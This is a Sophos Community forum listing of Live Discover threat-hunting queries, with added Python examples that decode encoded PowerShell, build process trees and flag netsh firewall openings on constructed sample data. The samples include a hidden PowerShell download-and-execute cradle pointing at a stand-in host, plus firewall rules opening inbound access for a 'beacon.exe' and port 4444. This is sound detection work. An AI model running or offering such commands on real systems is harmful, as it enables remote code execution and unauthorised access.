Sophos Community - Sophos Endpoint - Live Discover & Response Query Forum
Overview
Live Discover allows you to check the devices that Sophos Central is managing, look for signs of a threat, or assess compliance.
New to Live Discover & Response queries? See "Getting Started In Live Discover - From Beginner to Advanced Query Creation". Make sure to also check out "Best Practices On Using Live Discover & Response Query Forum" and the "Sophos EDR Threat Hunting Framework".
Note: For more information on Live Discover, please check out our Product Documentation.
Browse Live Response and Discover Queries by Category
Categories: Uncategorized, Anomalies, ATT&CK, Compliance, Device, Email, Events, Files, Live Response, Network, Other queries, Processes, Query Tips, Registry, Threat Hunting, User, Data Lake
Decode encoded powershell
Karl_Ackerman | Approved on 9 Nov 2020 | 2 Comments
With the common use of PowerShell by Cobalt Strike and every other threat actor, I thought it would be nice to have a query that detects and decodes encoded PowerShell commands. The first query will simply decode base64 encoded data (As you would see...
Posted 9 Nov 2020 11:39 PM
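As an added worked example (it is not Karl's query and not one of Sophos's canned queries): the prefilter select plus the decoding step, run here against constructed sample rows in SQLite, which is the engine behind osquery and therefore Live Discover. The table and column names sophos_process_journal, sophosPID, pathname and cmdline are assumptions about the Live Discover schema; check them in the schema browser before pasting the select. It goes a little beyond the post by accepting every abbreviation PowerShell allows for -EncodedCommand and by unwrapping nested layers, which is how stagers usually arrive.

```python
import base64
import binascii
import sqlite3


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64.
    Used here only to build the constructed sample rows."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


INNER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
OUTER = "powershell.exe -nop -w hidden -EncodedCommand " + encode_ps(INNER)

# Constructed sample rows standing in for the Sophos process journal. The table and
# column names (sophos_process_journal, sophosPID, pathname, cmdline) are assumptions
# about the Live Discover schema, not something taken from the post.
PS51 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_ROWS = [
    ("1-100", PS51, "powershell.exe -NoP -W Hidden -enc " + encode_ps("Write-Host 'hello'")),
    ("1-101", PS51, "powershell -e " + encode_ps(OUTER)),  # loader wrapping a second layer
    ("1-102", PS51, r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),  # -E is not -enc
    ("1-103", r"C:\Program Files\PowerShell\7\pwsh.exe", "pwsh -ec AAAA!!notbase64"),  # bad payload
    ("1-104", r"C:\Windows\System32\cmd.exe", "cmd /c whoami"),
]

# Live Discover queries run on SQLite (osquery), so this is the part you would paste
# into the console. It only narrows the rows; the decoding happens below.
QUERY = """
SELECT sophosPID, cmdline
FROM sophos_process_journal
WHERE (lower(pathname) LIKE '%powershell.exe' OR lower(pathname) LIKE '%pwsh.exe')
  AND (lower(cmdline) LIKE '% -e%' OR lower(cmdline) LIKE '% /e%')
"""


def load_sample_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE sophos_process_journal (sophosPID TEXT, pathname TEXT, cmdline TEXT)")
    con.executemany("INSERT INTO sophos_process_journal VALUES (?, ?, ?)", SAMPLE_ROWS)
    return con


def is_encoded_flag(token: str) -> bool:
    """True for every spelling PowerShell accepts for -EncodedCommand: -ec, or any
    abbreviation from -e upward (-en, -enc, ...). -ep and -ex belong to other switches."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    body = token[1:].lower()
    return body == "ec" or (body.startswith("e") and "encodedcommand".startswith(body))


def extract_encoded_payload(cmdline: str):
    """Return the base64 argument following an -EncodedCommand style switch, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            return tokens[i + 1].strip("\"'")
    return None


def decode_layers(cmdline: str, max_depth: int = 5) -> list:
    """Decode -enc payloads repeatedly: stagers often wrap a second encoded
    powershell invocation inside the first. One entry per layer; an
    undecodable payload ends the list with a marker instead of raising."""
    layers, current = [], cmdline
    for _ in range(max_depth):
        payload = extract_encoded_payload(current)
        if payload is None:
            break
        try:
            current = base64.b64decode(payload, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError) as exc:
            layers.append(f"<undecodable: {exc}>")
            break
        layers.append(current)
    return layers


def hunt_encoded_powershell(con: sqlite3.Connection) -> dict:
    """Run the prefilter query and decode each hit; returns {sophosPID: [layer1, layer2, ...]}."""
    results = {}
    for spid, cmdline in con.execute(QUERY):
        layers = decode_layers(cmdline)
        if layers:
            results[spid] = layers
    return results


if __name__ == "__main__":
    for spid, layers in hunt_encoded_powershell(load_sample_db()).items():
        print(spid)
        for depth, text in enumerate(layers, 1):
            print(f"  layer {depth}: {text[:90]}")
```

The select only narrows the journal to PowerShell launches that carry an -e style switch; the exact flag check and the base64 plus UTF-16LE decode happen afterwards, because matching `-enc` alone in SQL misses `-ec` and `-e` and would also match `-ExecutionPolicy`.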
Process HTTP Calls
JeramyKopacko | Approved on 27 Apr 2022 | 1 Comment
In testing out Caldera recently, the sandcat tool brings up a good point of interest in identifying where GET calls are being made. SELECT sophos_http_journal.PID, sophos_http_journal.PID, datetime(sophos_http_journal.time,'unixepoch','localtime') AS...
Posted 25 Nov 2020 7:46 PM
Query - Are any Sophos services not running?
Karl_Ackerman | Approved on 27 Apr 2022 | 3 Comments
REVIEWED by Sophos Sometimes adversaries are able to stop Sophos services, or the endpoint has had an install or update issue. As long as the Live Discover services are up and running you can find devices that do not have all the needed Sophos services...
Posted 12 Aug 2020 3:36 PM
Live Discover Query - Checking for redirected web traffic to unknown processes
jak | Approved on 10 May 2022 | 1 Comment
REVIEWED by Sophos While looking at the "sophos_ip_journal" table, I noticed the interesting field "redirectionState" which could be useful to find traffic that is being covertly redirected to a local proxy before being sent on its way unbeknown to...
Posted 1 May 2020 6:25 PM
Live Discover Query - Living off the land BITS
jak | Approved on 9 May 2022 | 1 Comment
REVIEWED by Sophos There are many libraries one can use for making web calls, be it PowerShell, WinHTTP, XML, but one of the more stealthy technologies is Background Intelligent Transfer Service (BITS). Information is available here as a starting point...
Posted 30 May 2020 8:43 PM
Threat Hunting - Powershell Script Blocks
AndyM | Approved on 27 Apr 2022 | 0 Comments
With the Sophos process journals you can see loads of information about the execution of processes as well as their command lines, but you cannot see the session data used directly in PowerShell, since it is running within the same process. Thankfully...
Posted 1 Mar 2021 4:07 PM
Generic Process Search on Windows
Karl_Ackerman | Approved on 9 May 2022 | 0 Comments
Hi folks, Sophos already published a canned query for 'Search for processes (Windows)', and while that one is really useful I had some asks for a different approach that allowed for larger time windows in the search and some different parameters. ...
Posted 15 Mar 2021 6:35 PM
Live Discover Query - Sysinternals
jak | Approved on 10 May 2022 | 1 Comment
REVIEWED by Sophos We all know how useful the tools from Sysinternals are. Thanks Mark! Clearly they are so useful that the crooks use them too, in particular, PsExec is a favorite. When these tools are run you have to accept a EULA, this state is...
Posted 20 Apr 2020 4:14 PM
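The EULA check from jak's post, as an added example that is not the code from the post itself. It uses osquery's real registry table columns (key, name, type, data, mtime), run here against constructed rows in SQLite; the SIDs, tools and timestamps are made up. In a real Live Discover run, `%` inside the key constraint matches one level of the hive path, which is exactly what is wanted here: one per-user hive under HKEY_USERS, then one key per Sysinternals tool.

```python
import sqlite3

# Constructed rows shaped like osquery's registry table. Column names are the real
# osquery ones; the SIDs, tool set and mtime values are invented for the example.
SAMPLE_REGISTRY = [
    (r"HKEY_USERS\S-1-5-21-1111-2222-3333-1001\Software\Sysinternals\PsExec",
     "EulaAccepted", "REG_DWORD", "1", 1587384000),
    (r"HKEY_USERS\S-1-5-21-1111-2222-3333-1001\Software\Sysinternals\ProcDump",
     "EulaAccepted", "REG_DWORD", "1", 1587384000),
    (r"HKEY_USERS\S-1-5-21-1111-2222-3333-1002\Software\Sysinternals\Autoruns",
     "EulaAccepted", "REG_DWORD", "1", 1587384000),
    # A different value under the same tool key: must not be reported.
    (r"HKEY_USERS\S-1-5-21-1111-2222-3333-1001\Software\Sysinternals\PsExec",
     "LastRun", "REG_SZ", "x", 1587384000),
]

# What you would paste into Live Discover. osquery stores registry data as text, so
# the DWORD 1 is compared as '1'. Backslashes are literal in SQLite LIKE (no ESCAPE).
QUERY = r"""
SELECT key, name, data, datetime(mtime, 'unixepoch') AS modified_utc
FROM registry
WHERE key LIKE 'HKEY_USERS\%\Software\Sysinternals\%'
  AND name = 'EulaAccepted'
  AND data = '1'
"""


def load_sample_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE registry (key TEXT, name TEXT, type TEXT, data TEXT, mtime INTEGER)")
    con.executemany("INSERT INTO registry VALUES (?, ?, ?, ?, ?)", SAMPLE_REGISTRY)
    return con


def accepted_eulas(con: sqlite3.Connection) -> list:
    """[(user_sid, tool, modified_utc)] for every Sysinternals tool a user has run.
    The value is written on first run (also when -accepteula is passed), so the key's
    mtime is roughly when that account first accepted the EULA on this host."""
    hits = []
    for key, _name, _data, modified in con.execute(QUERY):
        parts = key.split("\\")
        hits.append((parts[1], parts[-1], modified))
    return hits


def tools_by_user(con: sqlite3.Connection) -> dict:
    """Group the hits so a hunter can see at a glance which account touched which tools."""
    grouped = {}
    for sid, tool, _modified in accepted_eulas(con):
        grouped.setdefault(sid, set()).add(tool)
    return grouped


if __name__ == "__main__":
    for sid, tools in tools_by_user(load_sample_db()).items():
        print(sid, sorted(tools))
```

Pair the hit list with the process journal for the same account (cmdline containing `-accepteula` or `/accepteula`) to separate an admin who has used PsExec for years from an account that accepted the EULA for the first time yesterday.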
Live Discover - PowerShell command audit
jak | Approved on 12 May 2022 | 0 Comments
REVIEWED by Sophos Hello Threat Hunters! I mentioned in this post: https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/120201/live-response---command-audit/ how you could audit the history of PowerShell...
Posted 27 Jun 2020 1:56 PM
Live Discovery Query - SophosPID process activity digest
Karl_Ackerman | Approved on 4 May 2022 | 0 Comments
REVIEWED by Sophos We have added a new table to the Sophos forensics journals: the sophos_process_activity table. Often as part of an investigation you need to get a quick view of what a process did in the past, and this table provides a quick lookup...
Posted 26 May 2020 3:15 PM
Live Discover Query: ALL system activity for N seconds from a date/time
Karl_Ackerman | Approved on 9 May 2022 | 2 Comments
REVIEWED by Sophos This query will show ALL system activity that was recorded from a time period. Given the volume of data that can be returned we recommend only pulling a few seconds of information at a time and then using that to narrow down on...
Posted 26 May 2020 5:38 PM
Process that writes on Shadow Copy space
GiovanniGiovannelli | Approved on 10 May 2022 | 2 Comments
Any idea for creating a query in order to extract a list of processes that write on Shadow Copy space during a specified interval of time? Thank you
Posted 11 Dec 2020 5:17 PM
Live Discovery Query: Process tree for a SophosPID
Karl_Ackerman | Approved on 12 May 2022 | 2 Comments
REVIEWED by Sophos One of the first things I like to understand when looking at a suspect process is how did it get started and what child processes, if any, did it create. To do that we need to build a process tree from the Sophos process journal...
Posted 20 May 2020 11:41 AM
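An added example of the tree walk (this is not Karl's query): a recursive CTE over the process journal, run against constructed rows in SQLite, which is what Live Discover executes queries on. The table and column names sophos_process_journal, sophosPID, parentSophosPID, pathname and time are assumptions about the schema. The journal logs more than one event per process, so the walk runs over a deduplicated view of it, and both directions are capped so a bad parent link can never loop.

```python
import sqlite3

# Constructed rows standing in for the Sophos process journal. Table and column names
# are assumptions about the Live Discover schema. Process 1-13 appears twice on purpose
# (start and end event), which is what the real journal looks like.
SAMPLE_JOURNAL = [
    ("1-0",  None,   r"C:\Windows\System32\winlogon.exe", 1000),
    ("1-1",  "1-0",  r"C:\Windows\System32\userinit.exe", 1001),
    ("1-4",  "1-1",  r"C:\Windows\explorer.exe",          1002),
    ("1-9",  "1-4",  r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", 1500),
    ("1-12", "1-9",  r"C:\Windows\System32\cmd.exe",      1510),
    ("1-13", "1-12", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 1511),
    ("1-13", "1-12", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 1530),
    ("1-14", "1-13", r"C:\Windows\System32\whoami.exe",   1512),
    ("1-15", "1-4",  r"C:\Windows\System32\notepad.exe",  1600),  # sibling, not in the tree
]

# The query itself. :target is the SophosPID you are investigating. Ancestors get a
# negative depth, the target is depth 0, descendants are positive.
TREE_QUERY = """
WITH RECURSIVE
procs AS (
    -- one row per process, whichever events it logged
    SELECT sophosPID, parentSophosPID, pathname, MIN(time) AS started
    FROM sophos_process_journal GROUP BY sophosPID
),
ancestors(sophosPID, parentSophosPID, pathname, started, depth) AS (
    SELECT sophosPID, parentSophosPID, pathname, started, 0 FROM procs WHERE sophosPID = :target
    UNION ALL
    SELECT p.sophosPID, p.parentSophosPID, p.pathname, p.started, a.depth - 1
    FROM procs p JOIN ancestors a ON p.sophosPID = a.parentSophosPID
    WHERE a.depth > -32   -- cap the walk so a corrupt parent link cannot loop forever
),
descendants(sophosPID, parentSophosPID, pathname, started, depth) AS (
    SELECT sophosPID, parentSophosPID, pathname, started, 0 FROM procs WHERE sophosPID = :target
    UNION ALL
    SELECT p.sophosPID, p.parentSophosPID, p.pathname, p.started, d.depth + 1
    FROM procs p JOIN descendants d ON p.parentSophosPID = d.sophosPID
    WHERE d.depth < 32
)
SELECT depth, sophosPID, pathname, started FROM ancestors WHERE depth < 0
UNION ALL
SELECT depth, sophosPID, pathname, started FROM descendants
ORDER BY depth, started
"""


def load_sample_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE sophos_process_journal "
                "(sophosPID TEXT, parentSophosPID TEXT, pathname TEXT, time INTEGER)")
    con.executemany("INSERT INTO sophos_process_journal VALUES (?, ?, ?, ?)", SAMPLE_JOURNAL)
    return con


def process_tree(con: sqlite3.Connection, target: str) -> list:
    """[(depth, sophosPID, pathname)] from the oldest ancestor down to the last descendant."""
    return [(d, s, p) for d, s, p, _started in con.execute(TREE_QUERY, {"target": target})]


def render(tree: list) -> str:
    """Indented view, oldest ancestor first; the queried process is marked with *."""
    base = min(d for d, _, _ in tree)
    lines = []
    for depth, spid, path in tree:
        mark = "*" if depth == 0 else " "
        lines.append(f"{mark}{'  ' * (depth - base)}{spid}  {path}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(render(process_tree(load_sample_db(), "1-12")))
```

The GROUP BY in `procs` is the part people forget: without it every process that logged both a start and an end event is visited twice and the subtree below it is duplicated.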
Live Discover - Lateral movement detection
Karl_Ackerman | Approved on 6 May 2021 | 2 Comments
REVIEWED by Sophos With Live Discover I wanted to explore if I can write a query to detect lateral movement between devices that are under management. Because Live Discover queries are run on individual devices we cannot easily build a query that directly...
Posted 3 Jun 2020 12:22 PM
Live Discovery Query - Netsh - is something or someone allowing access?
jak | Approved on 11 May 2022 | 1 Comment
REVIEWED by Sophos I can imagine the scenario where malware has executed and maybe looks to set up a communication channel. In order to allow itself through the Windows firewall, it may well add an incoming rule using the command line tool netsh. It...
Posted 23 May 2020 2:07 PM
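An added example for the netsh scenario (not the query from jak's post): a prefilter select over the process journal, then the rule's key=value fields pulled apart so inbound allow rules can be separated from the rest and graded by where the allowed program lives. Run against constructed rows in SQLite; the table and column names sophos_process_journal, sophosPID, pathname and cmdline are assumptions about the Live Discover schema.

```python
import re
import sqlite3

NETSH = r"C:\Windows\System32\netsh.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed rows standing in for the Sophos process journal (assumed schema names).
SAMPLE_ROWS = [
    ("1-201", NETSH, r'netsh advfirewall firewall add rule name="Remote Admin" dir=in action=allow program="C:\Users\Public\svchost.exe" enable=yes'),
    ("1-202", NETSH, r'netsh advfirewall firewall add rule name="Block Telemetry" dir=out action=block remoteip=203.0.113.5'),
    ("1-203", NETSH, r'netsh firewall add allowedprogram C:\Temp\beacon.exe "Updater" ENABLE'),  # legacy syntax
    ("1-204", NETSH, r'netsh interface show interface'),
    ("1-205", CMD,   r'cmd.exe /c "netsh advfirewall firewall add rule name=svc dir=in action=allow protocol=TCP localport=4444"'),
    ("1-206", NETSH, r'netsh advfirewall firewall add rule name="RDP" dir=in action=allow program="C:\Windows\System32\svchost.exe" remoteip=10.0.0.0/8'),
]

# The part you would paste into Live Discover. It matches on cmdline rather than on
# pathname so a netsh call wrapped in cmd.exe /c or a script is still caught.
QUERY = """
SELECT sophosPID, pathname, cmdline
FROM sophos_process_journal
WHERE lower(cmdline) LIKE '%netsh%firewall%add %'
"""

# key=value pairs, with or without quotes around the value (quotes can hold spaces).
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Locations a legitimate service binary rarely lives in.
SUSPICIOUS_DIRS = re.compile(r"\\(users|temp|programdata|appdata)\\", re.IGNORECASE)


def load_sample_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE sophos_process_journal (sophosPID TEXT, pathname TEXT, cmdline TEXT)")
    con.executemany("INSERT INTO sophos_process_journal VALUES (?, ?, ?)", SAMPLE_ROWS)
    return con


def parse_netsh_add(cmdline: str) -> dict:
    """Fields of a 'netsh advfirewall firewall add rule' command. The pre-Vista
    'netsh firewall add ...' form has positional arguments, so it is only flagged."""
    if "advfirewall" not in cmdline.lower():
        return {"legacy": True, "raw": cmdline}
    fields = {k.lower(): v.strip('"') for k, v in KV.findall(cmdline)}
    fields["legacy"] = False
    return fields


def classify(fields: dict):
    """None for rules that do not open anything inbound, otherwise a verdict string."""
    if fields["legacy"]:
        return "legacy-syntax"
    if fields.get("dir", "").lower() != "in" or fields.get("action", "").lower() != "allow":
        return None
    if SUSPICIOUS_DIRS.search(fields.get("program", "")):
        return "inbound-allow-suspicious-path"
    return "inbound-allow"


def find_firewall_openings(con: sqlite3.Connection) -> list:
    """Run the prefilter, parse each hit, keep only the ones worth a look."""
    hits = []
    for spid, _pathname, cmdline in con.execute(QUERY):
        fields = parse_netsh_add(cmdline)
        verdict = classify(fields)
        if verdict:
            hits.append({"sophosPID": spid, "verdict": verdict, "fields": fields})
    return hits


if __name__ == "__main__":
    for hit in find_firewall_openings(load_sample_db()):
        print(hit["sophosPID"], hit["verdict"], hit["fields"].get("name") or hit["fields"].get("raw"))
```

A rule with no `program=` at all (the localport=4444 case) is still an inbound allow; the grading only adds the path check on top, it never drops a rule because the program field is missing.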
Live Discover Query - identify devices where services could be an issue
jak | Under Review on 18 Apr 2020 | 1 Comment
REVIEWED by Sophos One possibility is to simply query the "services" table for service status, for example: select s.display_name, s.status from services as s where (s.display_name like 'Sophos%' or s.display_name like 'HitmanPro%') and s.status ...
Posted 18 Apr 2020 11:14 AM
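Taking the select quoted in this post together with the "Are any Sophos services not running?" entry above, here is an added example that is not Sophos's canned query and not the code from either post. It covers the two failure modes the posts describe: a service that exists but is stopped although it should auto-start, and a service that is not installed at all. The services table columns and value spellings (RUNNING, STOPPED, AUTO_START, DEMAND_START) are osquery's real ones; the rows and the expected-service list are constructed, and the names in that list should be taken from a known-good device in your own estate rather than from here.

```python
import sqlite3

# Display names a healthy endpoint is expected to show. Constructed for the example;
# build the real list from a known-good device.
EXPECTED_DISPLAY_NAMES = {
    "Sophos Endpoint Defense Service",
    "Sophos MCS Client",
    "Sophos File Scanner Service",
    "HitmanPro.Alert service",
}

# Constructed rows shaped like osquery's services table.
SAMPLE_SERVICES = [
    ("SophosEndpointDefense", "Sophos Endpoint Defense Service", "RUNNING", "AUTO_START"),
    ("Sophos MCS Client",     "Sophos MCS Client",               "STOPPED", "AUTO_START"),   # should be up
    ("SophosCleanSvc",        "Sophos Clean Service",            "STOPPED", "DEMAND_START"),  # on demand, fine
    ("hmpalertsvc",           "HitmanPro.Alert service",         "RUNNING", "AUTO_START"),
    ("Spooler",               "Print Spooler",                   "RUNNING", "AUTO_START"),
    # "Sophos File Scanner Service" is deliberately absent: broken or incomplete install
]

# Extends the select from the post: only services configured to start automatically
# count as "not running", otherwise every on-demand service shows up as noise.
NOT_RUNNING_QUERY = """
SELECT s.name, s.display_name, s.status, s.start_type
FROM services AS s
WHERE (s.display_name LIKE 'Sophos%' OR s.display_name LIKE 'HitmanPro%')
  AND s.status <> 'RUNNING'
  AND s.start_type IN ('AUTO_START', 'BOOT_START', 'SYSTEM_START')
"""

PRESENT_QUERY = """
SELECT display_name FROM services
WHERE display_name LIKE 'Sophos%' OR display_name LIKE 'HitmanPro%'
"""


def load_sample_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE services (name TEXT, display_name TEXT, status TEXT, start_type TEXT)")
    con.executemany("INSERT INTO services VALUES (?, ?, ?, ?)", SAMPLE_SERVICES)
    return con


def not_running(con: sqlite3.Connection) -> list:
    """Auto-start Sophos/HitmanPro services that are not RUNNING right now."""
    return [row[1] for row in con.execute(NOT_RUNNING_QUERY)]


def missing(con: sqlite3.Connection, expected=EXPECTED_DISPLAY_NAMES) -> set:
    """Expected services with no entry at all. A stopped service is still listed in
    the services table; a missing one means the install is incomplete or was removed,
    which a status-only query can never show."""
    present = {row[0] for row in con.execute(PRESENT_QUERY)}
    return set(expected) - present


def health_report(con: sqlite3.Connection) -> dict:
    return {"not_running": not_running(con), "missing": sorted(missing(con))}


if __name__ == "__main__":
    print(health_report(load_sample_db()))
```

The status query alone is what Live Discover can run on the device; the "missing" comparison needs the expected list from outside the device, which is why it sits in the post-processing rather than in the select.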